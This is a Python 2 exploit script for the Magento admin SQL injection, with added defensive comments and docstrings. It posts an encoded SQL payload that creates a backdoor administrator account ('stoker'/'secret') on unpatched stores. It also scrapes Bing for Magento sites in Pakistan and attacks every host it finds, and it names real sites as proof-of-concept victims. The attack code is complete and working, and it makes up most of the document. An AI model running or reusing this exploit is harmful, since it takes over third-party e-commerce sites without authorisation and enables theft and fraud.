  1. #!/usr/bin/python
  2. \'\'\'
  3. POC Sites:
  4. www.anandindia.in
  5. goyalglassware.com
  6. ishopping.pk
  7. value.pk
  8.  
  9.  
  10. References:
  11. http://blog.checkpoint.com/2015/04/20/analyzing-magento-vulnerability/
  12. \'\'\'
  13. try:
  14.     from urlparse import urlsplit  # Python 2 module; the print statements further down are Python 2 syntax as well
  15.     import requests, base64, sys, re, os  # requests is third-party; sys is imported but never used in this file
  16. except:  # bare except catches everything, so the message below never says which import failed
  17.     exit("\\n\\n[-] Import Error !\\n")
  18.  
  19. def Exploit(url):
          """Send one POST to the Magento admin WYSIWYG directive endpoint on ``url``.

          The ``filter`` parameter carries an SQL payload that, on an unpatched site,
          inserts an admin_user row (username stoker / password secret) and a matching
          admin_role row. Only the HTTP status is checked afterwards, so the printed
          result is not evidence that the insert actually happened.
          """
  20.     final_url = "http://" + url + "/admin/Cms_Wysiwyg/directive/index/"  # scheme is hard-coded to plain http; this path plus the three POST fields below is the request shape to log or alert on
  21.     q = """
  22.         SET @SALT = \'rp\';
  23.         SET @PASS = CONCAT(MD5(CONCAT( @SALT , \'{password}\') ), CONCAT(\':\', @SALT ));
  24.         SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
  25.         INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES (\'Firstname\',\'Lastname\',\'email@example.com\',\'{username}\',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
  26.         INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,\'U\',(SELECT user_id FROM admin_user WHERE username = \'{username}\'),\'Firstname\');
  27.     """  # DB artefacts to look for during IR: an admin_user row with firstname Firstname, lastname Lastname, email@example.com, is_active 1, password stored as md5(rp + password):rp, rp_token NULL; and an admin_role row with parent_id 1, role_type U, role_name Firstname
  28.     query = q.replace("\\n", "").format(username="stoker", password="secret")  # newlines stripped so the payload is one line; credentials are hard-coded here
  29.     pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)  # the SQL is appended right after popularity[field_expr]=0), i.e. field_expr is the injection point
  30.     r = requests.post(final_url,  # no timeout, no TLS, no exception handling around the request
  31.                   data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",  # fixed base64 value; decode it when writing a signature
  32.                         "filter": base64.b64encode(pfilter),  # Python 2 str; on Python 3 b64encode would need bytes
  33.                         "forwarded": 1})
  34.     if r.ok:  # True for any status below 400; the response body is never inspected
  35.         print "\\n -- > [{0}/admin]  Credentials: [\'stoker\' : \'secret\']".format(url)  # printed on any non-error status, so a patched site can still show up here
  36.     else:
  37.         print " [-] {0} Not Vulnerable".format(url)
  38.  
  39. def main():
          """Collect hostnames from one Bing result page and call Exploit() on each.

          There is no scoping or authorisation check of any kind: every host the
          search engine returns for the hard-coded query receives the payload.
          """
  40.     # Change Dork in Bing URL if u need to modify it !
  41.     # Google Will also Work Same, infact more better if you use
  42.     # inurl:js/magentothem/
  43.     # dork, but it\'ll ask you to enter captcha after multiple requests from the same ip
  44.     # i\'m too lazy to play with that, so i gone ahead with bing.
  45.     # Bing\'s instreamUrl:Title:URL is not gonna work Here !
  46.     response = requests.get(\'http://www.bing.com/search?q=Powered+by+Magento+site%3Apk\')  # a single result page; no paging, no status check
  47.     URLs = re.findall(r\'href=[\\\'"]?([^\\\'" >]+)\', response.content) # every href on the raw result HTML, presumably including the search engine's own links (not filtered here)
  48.     URLS_LIST = [] # hostnames extracted below
  49.     for url in URLs:
  50.         baseUrl = urlsplit(url).netloc # host[:port] only; scheme and path are dropped
  51.         if len(baseUrl) != 0: # relative hrefs have an empty netloc and are skipped
  52.             URLS_LIST.append(baseUrl)
  53.     for uri in set(URLS_LIST):  # set() removes duplicate hosts
  54.         Exploit(uri)
  55.  
  56. if __name__ == \'__main__\':
  57.     os.system(\'cls\')  # Windows clear-screen command; elsewhere the shell presumably just reports an unknown command and execution continues
  58.     try:  # everything below, including the banner print, runs inside one bare try
  59.         print \'\'\'\\n
  60. -------------------------------------------------
  61.     Title:  Magento Auth Exploit !
  62.  
  63.     Author: Muhammad Adeel
  64.     Mail:   Chaudhary1337@gmail.com
  65.     Blog:   http://urdusecurity.blogspot.com
  66. -------------------------------------------------\\n\\n
  67.         \'\'\'
  68.         main()
  69.     except:  # bare except: any failure, including Ctrl-C and network errors, collapses to the one uninformative line below
  70.         exit("\\nErrrrrrrrrrrrrrrrroooooooooooooooooooooorrrrrrrrrrrrrrrrrrrrrrrrrrr !!!")